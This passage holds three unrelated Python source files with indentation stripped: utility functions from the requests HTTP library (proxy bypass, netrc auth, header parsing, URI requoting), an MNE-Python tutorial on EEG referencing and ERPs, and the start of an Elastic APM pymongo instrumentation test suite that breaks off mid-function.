# '<local>' string by the localhost entry and the corresponding
# canonical entry.
proxyOverride = proxyOverride.split(';')
# now check if we match one of the registry values.
for test in proxyOverride:
if test == '<local>':
if '.' not in host:
return True
test = test.replace(".", r"\.") # mask dots
test = test.replace("*", r".*") # change glob sequence
test = test.replace("?", r".") # change glob char
if re.match(test, host, re.I):
return True
return False
def proxy_bypass(host): # noqa
"""Return True, if the host should be bypassed.
Checks proxy settings gathered from the environment, if specified,
or the registry.
"""
if getproxies_environment():
return proxy_bypass_environment(host)
else:
return proxy_bypass_registry(host)
def dict_to_sequence(d):
"""Returns an internal sequence dictionary update."""
if hasattr(d, 'items'):
d = d.items()
return d
def super_len(o):
total_length = None
current_position = 0
if hasattr(o, '__len__'):
total_length = len(o)
elif hasattr(o, 'len'):
total_length = o.len
elif hasattr(o, 'fileno'):
try:
fileno = o.fileno()
except io.UnsupportedOperation:
pass
else:
total_length = os.fstat(fileno).st_size
# Having used fstat to determine the file length, we need to
# confirm that this file was opened up in binary mode.
if 'b' not in o.mode:
warnings.warn((
"Requests has determined the content-length for this "
"request using the binary size of the file: however, the "
"file has been opened in text mode (i.e. without the 'b' "
"flag in the mode). This may lead to an incorrect "
"content-length. In Requests 3.0, support will be removed "
"for files in text mode."),
FileModeWarning
)
if hasattr(o, 'tell'):
try:
current_position = o.tell()
except (OSError, IOError):
# This can happen in some weird situations, such as when the file
# is actually a special file descriptor like stdin. In this
# instance, we don't know what the length is, so set it to zero and
# let requests chunk it instead.
if total_length is not None:
current_position = total_length
else:
if hasattr(o, 'seek') and total_length is None:
# StringIO and BytesIO have seek but no useable fileno
try:
# seek to end of file
o.seek(0, 2)
total_length = o.tell()
# seek back to current position to support
# partially read file-like objects
o.seek(current_position or 0)
except (OSError, IOError):
total_length = 0
if total_length is None:
total_length = 0
return max(0, total_length - current_position)
def get_netrc_auth(url, raise_errors=False):
"""Returns the Requests tuple auth for a given url from netrc."""
try:
from netrc import netrc, NetrcParseError
netrc_path = None
for f in NETRC_FILES:
try:
loc = os.path.expanduser('~/{0}'.format(f))
except KeyError:
# os.path.expanduser can fail when $HOME is undefined and
# getpwuid fails. See http://bugs.python.org/issue20164 &
# https://github.com/kennethreitz/requests/issues/1846
return
if os.path.exists(loc):
netrc_path = loc
break
# Abort early if there isn't one.
if netrc_path is None:
return
ri = urlparse(url)
# Strip port numbers from netloc. This weird `if...encode`` dance is
# used for Python 3.2, which doesn't support unicode literals.
splitstr = b':'
if isinstance(url, str):
splitstr = splitstr.decode('ascii')
host = ri.netloc.split(splitstr)[0]
try:
_netrc = netrc(netrc_path).authenticators(host)
if _netrc:
# Return with login / password
login_i = (0 if _netrc[0] else 1)
return (_netrc[login_i], _netrc[2])
except (NetrcParseError, IOError):
# If there was a parsing error or a permissions issue reading the file,
# we'll just skip netrc auth unless explicitly asked to raise errors.
if raise_errors:
raise
# AppEngine hackiness.
except (ImportError, AttributeError):
pass
def guess_filename(obj):
"""Tries to guess the filename of the given object."""
name = getattr(obj, 'name', None)
if (name and isinstance(name, basestring) and name[0] != '<' and
name[-1] != '>'):
return os.path.basename(name)
def from_key_val_list(value):
"""Take an object and test to see if it can be represented as a
dictionary. Unless it can not be represented as such, return an
OrderedDict, e.g.,
::
>>> from_key_val_list([('key', 'val')])
OrderedDict([('key', 'val')])
>>> from_key_val_list('string')
ValueError: need more than 1 value to unpack
>>> from_key_val_list({'key': 'val'})
OrderedDict([('key', 'val')])
:rtype: OrderedDict
"""
if value is None:
return None
if isinstance(value, (str, bytes, bool, int)):
raise ValueError('cannot encode objects that are not 2-tuples')
return OrderedDict(value)
def to_key_val_list(value):
"""Take an object and test to see if it can be represented as a
dictionary. If it can be, return a list of tuples, e.g.,
::
>>> to_key_val_list([('key', 'val')])
[('key', 'val')]
>>> to_key_val_list({'key': 'val'})
[('key', 'val')]
>>> to_key_val_list('string')
ValueError: cannot encode objects that are not 2-tuples.
:rtype: list
"""
if value is None:
return None
if isinstance(value, (str, bytes, bool, int)):
raise ValueError('cannot encode objects that are not 2-tuples')
if isinstance(value, collections.Mapping):
value = value.items()
return list(value)
# From mitsuhiko/werkzeug (used with permission).
def parse_list_header(value):
"""Parse lists as described by RFC 2068 Section 2.
In particular, parse comma-separated lists where the elements of
the list may include quoted-strings. A quoted-string could
contain a comma. A non-quoted string could have quotes in the
middle. Quotes are removed automatically after parsing.
It basically works like :func:`parse_set_header` just that items
may appear multiple times and case sensitivity is preserved.
The return value is a standard :class:`list`:
>>> parse_list_header('token, "quoted value"')
['token', 'quoted value']
To create a header from the :class:`list` again, use the
:func:`dump_header` function.
:param value: a string with a list header.
:return: :class:`list`
:rtype: list
"""
result = []
for item in _parse_list_header(value):
if item[:1] == item[-1:] == '"':
item = unquote_header_value(item[1:-1])
result.append(item)
return result
# From mitsuhiko/werkzeug (used with permission).
def parse_dict_header(value):
"""Parse lists of key, value pairs as described by RFC 2068 Section 2 and
convert them into a python dict:
>>> d = parse_dict_header('foo="is a fish", bar="as well"')
>>> type(d) is dict
True
>>> sorted(d.items())
[('bar', 'as well'), ('foo', 'is a fish')]
If there is no value for a key it will be `None`:
>>> parse_dict_header('key_without_value')
{'key_without_value': None}
To create a header from the :class:`dict` again, use the
:func:`dump_header` function.
:param value: a string with a dict header.
:return: :class:`dict`
:rtype: dict
"""
result = {}
for item in _parse_list_header(value):
if '=' not in item:
result[item] = None
continue
name, value = item.split('=', 1)
if value[:1] == value[-1:] == '"':
value = unquote_header_value(value[1:-1])
result[name] = value
return result
# From mitsuhiko/werkzeug (used with permission).
def unquote_header_value(value, is_filename=False):
r"""Unquotes a header value. (Reversal of :func:`quote_header_value`).
This does not use the real unquoting but what browsers are actually
using for quoting.
:param value: the header value to unquote.
:rtype: str
"""
if value and value[0] == value[-1] == '"':
# this is not the real unquoting, but fixing this so that the
# RFC is met will result in bugs with internet explorer and
# probably some other browsers as well. IE for example is
# uploading files with "C:\foo\bar.txt" as filename
value = value[1:-1]
# if this is a filename and the starting characters look like
# a UNC path, then just return the value without quotes. Using the
# replace sequence below on a UNC path has the effect of turning
# the leading double slash into a single slash and then
# _fix_ie_filename() doesn't work correctly. See #458.
if not is_filename or value[:2] != '\\\\':
return value.replace('\\\\', '\\').replace('\\"', '"')
return value
def dict_from_cookiejar(cj):
"""Returns a key/value dictionary from a CookieJar.
:param cj: CookieJar object to extract cookies from.
:rtype: dict
"""
cookie_dict = {}
for cookie in cj:
cookie_dict[cookie.name] = cookie.value
return cookie_dict
def add_dict_to_cookiejar(cj, cookie_dict):
"""Returns a CookieJar from a key/value dictionary.
:param cj: CookieJar to insert cookies into.
:param cookie_dict: Dict of key/values to insert into CookieJar.
:rtype: CookieJar
"""
return cookiejar_from_dict(cookie_dict, cj)
def get_encodings_from_content(content):
"""Returns encodings from given content string.
:param content: bytestring to extract encodings from.
"""
warnings.warn((
'In requests 3.0, get_encodings_from_content will be removed. For '
'more information, please see the discussion on issue #2266. (This'
' warning should only appear once.)'),
DeprecationWarning)
charset_re = re.compile(r'<meta.*?charset=["\']*(.+?)["\'>]', flags=re.I)
pragma_re = re.compile(r'<meta.*?content=["\']*;?charset=(.+?)["\'>]', flags=re.I)
xml_re = re.compile(r'^<\?xml.*?encoding=["\']*(.+?)["\'>]')
return (charset_re.findall(content) +
pragma_re.findall(content) +
xml_re.findall(content))
def get_encoding_from_headers(headers):
"""Returns encodings from given HTTP Header Dict.
:param headers: dictionary to extract encoding from.
:rtype: str
"""
content_type = headers.get('content-type')
if not content_type:
return None
content_type, params = cgi.parse_header(content_type)
if 'charset' in params:
return params['charset'].strip("'\"")
if 'text' in content_type:
return 'ISO-8859-1'
def stream_decode_response_unicode(iterator, r):
"""Stream decodes a iterator."""
if r.encoding is None:
for item in iterator:
yield item
return
decoder = codecs.getincrementaldecoder(r.encoding)(errors='replace')
for chunk in iterator:
rv = decoder.decode(chunk)
if rv:
yield rv
rv = decoder.decode(b'', final=True)
if rv:
yield rv
def iter_slices(string, slice_length):
"""Iterate over slices of a string."""
pos = 0
if slice_length is None or slice_length <= 0:
slice_length = len(string)
while pos < len(string):
yield string[pos:pos + slice_length]
pos += slice_length
def get_unicode_from_response(r):
"""Returns the requested content back in unicode.
:param r: Response object to get unicode content from.
Tried:
1. charset from content-type
2. fall back and replace all unicode characters
:rtype: str
"""
warnings.warn((
'In requests 3.0, get_unicode_from_response will be removed. For '
'more information, please see the discussion on issue #2266. (This'
' warning should only appear once.)'),
DeprecationWarning)
tried_encodings = []
# Try charset from content-type
encoding = get_encoding_from_headers(r.headers)
if encoding:
try:
return str(r.content, encoding)
except UnicodeError:
tried_encodings.append(encoding)
# Fall back:
try:
return str(r.content, encoding, errors='replace')
except TypeError:
return r.content
# The unreserved URI characters (RFC 3986)
UNRESERVED_SET = frozenset(
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
+ "0123456789-._~")
def unquote_unreserved(uri):
"""Un-escape any percent-escape sequences in a URI that are unreserved
characters. This leaves all reserved, illegal and non-ASCII bytes encoded.
:rtype: str
"""
parts = uri.split('%')
for i in range(1, len(parts)):
h = parts[i][0:2]
if len(h) == 2 and h.isalnum():
try:
c = chr(int(h, 16))
except ValueError:
raise InvalidURL("Invalid percent-escape sequence: '%s'" % h)
if c in UNRESERVED_SET:
parts[i] = c + parts[i][2:]
else:
parts[i] = '%' + parts[i]
else:
parts[i] = '%' + parts[i]
return ''.join(parts)
def requote_uri(uri):
"""Re-quote the given URI.
This function passes the given URI through an unquote/quote cycle to
ensure that it is fully and consistently quoted.
:rtype: str
"""
safe_with_percent = "!#$%&'()*+,/:;=?@[]~"
safe_without_percent = "!#$&'()*+,/:;=?@[]~"
try:
# Unquote only the unreserved characters
# Then quote only illegal characters (do not quote reserved,
# unreserved, or '%')
return quote(unquote_unreserved(uri), safe=safe_with_percent)
except InvalidURL:
# We couldn't unquote the given URI, so let's try quoting it, but
# there may be unquoted '%'s in the URI. We need to make sure they're
# properly quoted so they do not cause issues elsewhere.
return quote(uri, safe=safe_without_percent)
def address_in_network(ip, net):
"""This function allows you to check if an IP belongs to a network subnet
Example: returns True if ip = 192.168.1.1 and net = 192.168.1.0/24
returns False if ip = 192.168.1.1 and net = 192.168.100.0/24
:rtype: bool
"""
ipaddr = struct.unpack('=L', socket.inet_aton(ip))[0]
netaddr, bits = net.split('/')
netmask = struct.unpack('=L', socket.inet_aton(dotted_netmask(int(bits))))[0]
network = struct.unpack('=L', socket.inet_aton(netaddr))[0] & netmask
return (ipaddr & netmask) == (network & netmask)
def dotted_netmask(mask):
"""Converts mask from /xx format to xxx.xxx.xxx.xxx
Example: if mask is 24 function returns 255.255.255.0
:rtype: str
"""
bits = 0xffffffff ^ (1 << 32 - mask) - 1
return socket.inet_ntoa(struct.pack('>I', bits))
def is_ipv4_address(string_ip):
"""
:rtype: bool
"""
try:
socket.inet_aton(string_ip)
except socket.error:
return False
return True
def is_valid_cidr(string_network):
"""
Very simple check of the cidr format in no_proxy variable.
:rtype: bool
"""
if string_network.count('/') == 1:
try:
mask = int(string_network.split('/')[1])
except ValueError:
return False
if mask < 1 or mask > 32:
return False
try:
socket.inet_aton(string_network.split('/')[0])
except socket.error:
return False
else:
return False
return True
@contextlib.contextmanager
def set_environ(env_name, value):
"""Set the environment variable 'env_name' to 'value'
Save previous value, yield, and then restore the previous value stored in
the environment variable 'env_name'.
If 'value' is None, do nothing"""
if value is not None:
old_value = os.environ.get(env_name)
os.environ[env_name] = value
try:
yield
finally:
if value is None:
return
if old_value is None:
del os.environ[env_name]
else:
os.environ[env_name] = old_value
def should_bypass_proxies(url, no_proxy):
"""
Returns whether we should bypass proxies or not.
:rtype: bool
"""
get_proxy = lambda k: os.environ.get(k) or os.environ.get(k.upper())
# First check whether no_proxy is defined. If it is, check that the URL
# we're getting isn't in the no_proxy list.
no_proxy_arg = no_proxy
if no_proxy is None:
no_proxy = get_proxy('no_proxy')
netloc = urlparse(url).netloc
if no_proxy:
# We need to check whether we match here. We need to see if we match
# the end of the netloc, both with and without the port.
no_proxy = (
host for host in no_proxy.replace(' ', '').split(',') if host
)
ip = netloc.split(':')[0]
if is_ipv4_address(ip):
for proxy_ip in no_proxy:
if is_valid_cidr(proxy_ip):
if address_in_network(ip, proxy_ip):
return True
elif ip == proxy_ip:
# If no_proxy ip was defined in plain IP notation instead of cidr notation &
# matches the IP of the index
return True
else:
for host in no_proxy:
if netloc.endswith(host) or netloc.split(':')[0].endswith(host):
# The URL does match something in no_proxy, so we don't want
# to apply the proxies on this URL.
return True
# If the system proxy settings indicate that this URL should be bypassed,
# don't proxy.
# The proxy_bypass function is incredibly buggy on OS X in early versions
# of Python 2.6, so allow this call to fail. Only catch the specific
# exceptions we've seen, though: this call failing in other ways can reveal
# legitimate problems.
with set_environ('no_proxy', no_proxy_arg):
try:
bypass = proxy_bypass(netloc)
except (TypeError, socket.gaierror):
bypass = False
if bypass:
return True
return False
def get_environ_proxies(url, no_proxy):
"""
Return a dict of environment proxies.
:rtype: dict
"""
if should_bypass_proxies(url, no_proxy=no_proxy):
return {}
else:
return getproxies()
def select_proxy(url, proxies):
"""Select a proxy for the url, if applicable.
:param url: The url being for the request
:param proxies: A dictionary of schemes or schemes and hosts to proxy URLs
"""
proxies = proxies or {}
urlparts = urlparse(url)
if urlparts.hostname is None:
return proxies.get(urlparts.scheme, proxies.get('all'))
proxy_keys = [
urlparts.scheme + '://' + urlparts.hostname,
urlparts.scheme,
'all://' + urlparts.hostname,
'all',
]
proxy = None
for proxy_key in proxy_keys:
if proxy_key in proxies:
proxy = proxies[proxy_key]
break
return proxy
def default_user_agent(name="python-requests"):
"""
Return a string representing the default user agent.
:rtype: str
"""
return '%s/%s' % (name, __version__)
def default_headers():
"""
:rtype: requests.structures.CaseInsensitiveDict
"""
return CaseInsensitiveDict({
'User-Agent': default_user_agent(),
'Accept-Encoding': ', '.join(('gzip', 'deflate')),
'Accept': '*/*',
'Connection': 'keep-alive',
})
def parse_header_links(value):
"""Return a dict of parsed link headers proxies.
i.e. Link: <http:/.../front.jpeg>; rel=front; type="image/jpeg",<http://.../back.jpeg>; rel=back;type="image/jpeg"
:rtype: list
"""
links = []
replace_chars = ' \'"'
for val in re.split(', *<', value):
try:
url, params = val.split(';', 1)
except ValueError:
url, params = val, ''
link = {'url': url.strip('<> \'"')}
for param in params.split(';'):
try:
key, value = param.split('=')
except ValueError:
break
link[key.strip(replace_chars)] = value.strip(replace_chars)
links.append(link)
return links
# Null bytes; no need to recreate these on each call to guess_json_utf
_null = '\x00'.encode('ascii') # encoding to ASCII for Python 3
_null2 = _null * 2
_null3 = _null * 3
def guess_json_utf(data):
"""
:rtype: str
"""
# JSON always starts with two ASCII characters, so detection is as
# easy as counting the nulls and from their location and count
# determine the encoding. Also detect a BOM, if present.
sample = data[:4]
if sample in (codecs.BOM_UTF32_LE, codecs.BOM_UTF32_BE):
return 'utf-32' # BOM included
if sample[:3] == codecs.BOM_UTF8:
return 'utf-8-sig' # BOM included, MS style (discouraged)
if sample[:2] in (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE):
return 'utf-16' # BOM included
nullcount = sample.count(_null)
if nullcount == 0:
return 'utf-8'
if nullcount == 2:
if sample[::2] == _null2: # 1st and 3rd are null
return 'utf-16-be'
if sample[1::2] == _null2: # 2nd and 4th are null
return 'utf-16-le'
# Did not detect 2 valid UTF-16 ascii-range characters
if nullcount == 3:
if sample[:3] == _null3:
return 'utf-32-be'
if sample[1:] == _null3:
return 'utf-32-le'
# Did not detect a valid UTF-32 ascii-range character
return None
def prepend_scheme_if_needed(url, new_scheme):
"""Given a URL that may or may not have a scheme, prepend the given scheme.
Does not replace a present scheme with the one provided as an argument.
:rtype: str
"""
scheme, netloc, path, params, query, fragment = urlparse(url, new_scheme)
# urlparse is a finicky beast, and sometimes decides that there isn't a
# netloc present. Assume that it's being over-cautious, and switch netloc
# and path if urlparse decided there was no netloc.
if not netloc:
netloc, path = path, netloc
return urlunparse((scheme, netloc, path, params, query, fragment))
def get_auth_from_url(url):
"""Given a url with authentication components, extract them into a tuple of
username,password.
:rtype: (str,str)
"""
parsed = urlparse(url)
try:
auth = (unquote(parsed.username), unquote(parsed.password))
except (AttributeError, TypeError):
auth = ('', '')
return auth
# Moved outside of function to avoid recompile every call
_CLEAN_HEADER_REGEX_BYTE = re.compile(b'^\\S[^\\r\\n]*$|^$')
_CLEAN_HEADER_REGEX_STR = re.compile(r'^\S[^\r\n]*$|^$')
def check_header_validity(header):
"""Verifies that header value is a string which doesn't contain
leading whitespace or return characters. This prevents unintended
header injection.
:param header: tuple, in the format (name, value).
"""
name, value = header
if isinstance(value, bytes):
pat = _CLEAN_HEADER_REGEX_BYTE
else:
pat = _CLEAN_HEADER_REGEX_STR
try:
if not pat.match(value):
raise InvalidHeader("Invalid return character or leading space in header: %s" % name)
except TypeError:
raise InvalidHeader("Header value %s must be of type str or bytes, "
"not %s" % (value, type(value)))
def urldefragauth(url):
"""
Given a url remove the fragment and the authentication part.
:rtype: str
"""
scheme, netloc, path, params, query, fragment = urlparse(url)
# see func:`prepend_scheme_if_needed`
if not netloc:
netloc, path = path, netloc
netloc = netloc.rsplit('@', 1)[-1]
return urlunparse((scheme, netloc, path, params, query, ''))
def rewind_body(prepared_request):
"""Move file pointer back to its recorded starting position
so it can be read again on redirect.
"""
body_seek = getattr(prepared_request.body, 'seek', None)
if body_seek is not None and isinstance(prepared_request._body_position, integer_types):
try:
body_seek(prepared_request._body_position)
except (IOError, OSError):
raise UnrewindableBodyError("An error occurred when rewinding request "
"body for redirect.")
else:
raise UnrewindableBodyError("Unable to rewind request body for redirect.")
| |
"""
.. _tut_erp:
EEG processing and Event Related Potentials (ERPs)
==================================================
.. contents:: Here we cover the specifics of EEG, namely:
:local:
:depth: 1
"""
import mne
from mne.datasets import sample
from mne.channels import combine_channels
###############################################################################
# Setup for reading the raw data
data_path = sample.data_path()
raw_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw.fif'
event_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw-eve.fif'
raw = mne.io.read_raw_fif(raw_fname)
###############################################################################
# Let's restrict the data to the EEG channels
raw.pick_types(meg=False, eeg=True, eog=True).load_data()
# This particular dataset already has an average reference projection added
# that we now want to remove it for the sake of this example.
raw.set_eeg_reference([])
###############################################################################
# By looking at the measurement info you will see that we have now
# 59 EEG channels and 1 EOG channel
print(raw.info)
###############################################################################
# In practice it's quite common to have some EEG channels that are actually
# EOG channels. To change a channel type you can use the
# :func:`mne.io.Raw.set_channel_types` method. For example
# to treat an EOG channel as EEG you can change its type using
raw.set_channel_types(mapping={'EOG 061': 'eeg'})
print(raw.info)
###############################################################################
# And to change the name of the EOG channel
raw.rename_channels(mapping={'EOG 061': 'EOG'})
###############################################################################
# Let's reset the EOG channel back to EOG type.
raw.set_channel_types(mapping={'EOG': 'eog'})
###############################################################################
# The EEG channels in the sample dataset already have locations.
# These locations are available in the 'loc' of each channel description.
# For the first channel we get
print(raw.info['chs'][0]['loc'])
###############################################################################
# And it's actually possible to plot the channel locations using
# :func:`mne.io.Raw.plot_sensors`.
# In the case where your data don't have locations you can use one of the
# standard :class:`Montages <mne.channels.DigMontage>` shipped with MNE.
# See :ref:`plot_montage` and :ref:`tut-eeg-fsaverage-source-modeling`.
raw.plot_sensors()
raw.plot_sensors('3d') # in 3D
###############################################################################
# Setting EEG reference
# ---------------------
#
# Let's first inspect our Raw object with its original reference that was
# applied during the recording of the data.
# We define Epochs and compute an ERP for the left auditory condition.
reject = dict(eeg=180e-6, eog=150e-6)
event_id, tmin, tmax = {'left/auditory': 1}, -0.2, 0.5
events = mne.read_events(event_fname)
epochs_params = dict(events=events, event_id=event_id, tmin=tmin, tmax=tmax,
reject=reject)
evoked_no_ref = mne.Epochs(raw, **epochs_params).average()
title = 'EEG Original reference'
evoked_no_ref.plot(titles=dict(eeg=title), time_unit='s')
evoked_no_ref.plot_topomap(times=[0.1], size=3., title=title, time_unit='s')
###############################################################################
# **Common average reference (car)**: We add back the average reference
# projection that we removed at the beginning of this example (right after
# loading the data).
raw_car, _ = mne.set_eeg_reference(raw, 'average', projection=True)
evoked_car = mne.Epochs(raw_car, **epochs_params).average()
del raw_car # save memory
title = 'EEG Average reference'
evoked_car.plot(titles=dict(eeg=title), time_unit='s')
evoked_car.plot_topomap(times=[0.1], size=3., title=title, time_unit='s')
###############################################################################
# **Custom reference**: Use the mean of channels EEG 001 and EEG 002 as
# a reference
raw_custom, _ = mne.set_eeg_reference(raw, ['EEG 001', 'EEG 002'])
evoked_custom = mne.Epochs(raw_custom, **epochs_params).average()
del raw_custom # save memory
title = 'EEG Custom reference'
evoked_custom.plot(titles=dict(eeg=title), time_unit='s')
evoked_custom.plot_topomap(times=[0.1], size=3., title=title, time_unit='s')
###############################################################################
# Evoked response averaged across channels by ROI
# -----------------------------------------------
#
# It is possible to average channels by region of interest (for example left
# and right) when studying the response to this left auditory stimulus. Here we
# use our Raw object on which the average reference projection has been added
# back.
evoked = mne.Epochs(raw, **epochs_params).average()
left_idx = mne.pick_channels(evoked.info['ch_names'],
['EEG 017', 'EEG 018', 'EEG 025', 'EEG 026'])
right_idx = mne.pick_channels(evoked.info['ch_names'],
['EEG 023', 'EEG 024', 'EEG 034', 'EEG 035'])
roi_dict = dict(Left=left_idx, Right=right_idx)
evoked_combined = combine_channels(evoked, roi_dict, method='mean')
title = 'Evoked response averaged by side'
evoked_combined.plot(titles=dict(eeg=title), time_unit='s')
###############################################################################
# Evoked arithmetic (e.g. differences)
# ------------------------------------
#
# Trial subsets from Epochs can be selected using 'tags' separated by '/'.
# Evoked objects support basic arithmetic.
# First, we create an Epochs object containing 4 conditions.
event_id = {'left/auditory': 1, 'right/auditory': 2,
'left/visual': 3, 'right/visual': 4}
epochs_params = dict(events=events, event_id=event_id, tmin=tmin, tmax=tmax,
reject=reject)
epochs = mne.Epochs(raw, **epochs_params)
print(epochs)
###############################################################################
# Next, we create averages of stimulation-left vs stimulation-right trials.
# We can use negative weights in `mne.combine_evoked` to construct difference
# ERPs.
left, right = epochs["left"].average(), epochs["right"].average()
# create and plot difference ERP
joint_kwargs = dict(ts_args=dict(time_unit='s'),
topomap_args=dict(time_unit='s'))
mne.combine_evoked([left, right], weights=[1, -1]).plot_joint(**joint_kwargs)
###############################################################################
# This is an equal-weighting difference. If you have imbalanced trial numbers,
# you could also consider either equalizing the number of events per
# condition (using
# `epochs.equalize_event_counts <mne.Epochs.equalize_event_counts>`) or
# use weights proportional to the number of trials averaged together to create
# each `~mne.Evoked` (by passing ``weights='nave'`` to `~mne.combine_evoked`).
# As an example, first, we create individual ERPs for each condition.
aud_l = epochs["auditory/left"].average()
aud_r = epochs["auditory/right"].average()
vis_l = epochs["visual/left"].average()
vis_r = epochs["visual/right"].average()
all_evokeds = [aud_l, aud_r, vis_l, vis_r]
print(all_evokeds)
###############################################################################
# This can be simplified with a Python list comprehension:
all_evokeds = [epochs[cond].average() for cond in sorted(event_id.keys())]
print(all_evokeds)
# Then, we can construct and plot an unweighted average of left vs. right
# trials this way, too:
mne.combine_evoked(
all_evokeds, weights=[0.5, 0.5, -0.5, -0.5]).plot_joint(**joint_kwargs)
###############################################################################
# Often, it makes sense to store Evoked objects in a dictionary or a list -
# either different conditions, or different subjects.
# If they are stored in a list, they can be easily averaged, for example,
# for a grand average across subjects (or conditions).
grand_average = mne.grand_average(all_evokeds)
# And they can be written to disk like any other evoked data, e.g.:
# mne.write_evokeds('tmp-ave.fif', all_evokeds)
# If Evokeds objects are stored in a dictionary, they can be retrieved by name.
all_evokeds = dict((cond, epochs[cond].average()) for cond in event_id)
print(all_evokeds['left/auditory'])
# Besides for explicit access, this can be used for example to set titles.
for cond in all_evokeds:
all_evokeds[cond].plot_joint(title=cond, **joint_kwargs)
| |
# BSD 3-Clause License
#
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime
import os
import pytest
from elasticapm.conf.constants import TRANSACTION
pymongo = pytest.importorskip("pymongo")
pytestmark = [pytest.mark.mongodb]
if "MONGODB_HOST" not in os.environ:
pytestmark.append(pytest.mark.skip("Skipping mongodb tests, no MONGODB_HOST environment variable set"))
@pytest.fixture()
def mongo_database():
connection_params = {
"host": os.environ.get("MONGODB_HOST", "localhost"),
"port": int(os.environ.get("MONGODB_PORT", 27017)),
}
if pymongo.version_tuple < (3, 0):
connection_params["safe"] = True
mongo = pymongo.MongoClient(**connection_params)
db = mongo.elasticapm_test
yield db
mongo.drop_database("elasticapm_test")
mongo.close()
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_bulk_write(instrument, elasticapm_client, mongo_database):
elasticapm_client.begin_transaction("transaction.test")
requests = [
pymongo.InsertOne({"x": 1}),
pymongo.DeleteOne({"x": 1}),
pymongo.ReplaceOne({"w": 1}, {"z": 1}, upsert=True),
]
result = mongo_database.blogposts.bulk_write(requests)
assert result.inserted_count == 1
assert result.deleted_count == 1
assert result.upserted_count == 1
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.bulk_write"
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
@pytest.mark.integrationtest
def test_collection_count(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
mongo_database.blogposts.insert(blogpost)
elasticapm_client.begin_transaction("transaction.test")
count = mongo_database.blogposts.count()
assert count == 1
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.count"
assert span["context"]["destination"] == {
"address": os.environ.get("MONGODB_HOST", "localhost"),
"port": int(os.environ.get("MONGODB_PORT", 27017)),
"service": {"name": "", "resource": "mongodb", "type": ""},
}
@pytest.mark.skipif(pymongo.version_tuple < (3, 7), reason="New in 3.7")
@pytest.mark.integrationtest
def test_collection_count_documents(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
mongo_database.blogposts.insert_one(blogpost)
elasticapm_client.begin_transaction("transaction.test")
count = mongo_database.blogposts.count_documents({"author": "Tom"})
assert count == 1
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.count_documents"
assert span["context"]["destination"] == {
"address": os.environ.get("MONGODB_HOST", "localhost"),
"port": int(os.environ.get("MONGODB_PORT", 27017)),
"service": {"name": "", "resource": "mongodb", "type": ""},
}
@pytest.mark.skipif(pymongo.version_tuple < (3, 7), reason="New in 3.7")
@pytest.mark.integrationtest
def test_collection_estimated_document_count(instrument, elasticapm_client, mongo_database):
blogpost = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
mongo_database.blogposts.insert_one(blogpost)
elasticapm_client.begin_transaction("transaction.test")
count = mongo_database.blogposts.estimated_document_count()
assert count == 1
elasticapm_client.end_transaction("transaction.test")
transactions = elasticapm_client.events[TRANSACTION]
span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transactions[0]))
assert span["type"] == "db"
assert span["subtype"] == "mongodb"
assert span["action"] == "query"
assert span["name"] == "elasticapm_test.blogposts.estimated_document_count"
assert span["context"]["destination"] == {
"address": os.environ.get("MONGODB_HOST", "localhost"),
"port": int(os.environ.get("MONGODB_PORT", 27017)),
"service": {"name": "", "resource": "mongodb", "type": ""},
}
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_delete_one(instrument, elasticapm_client, mongo_database):
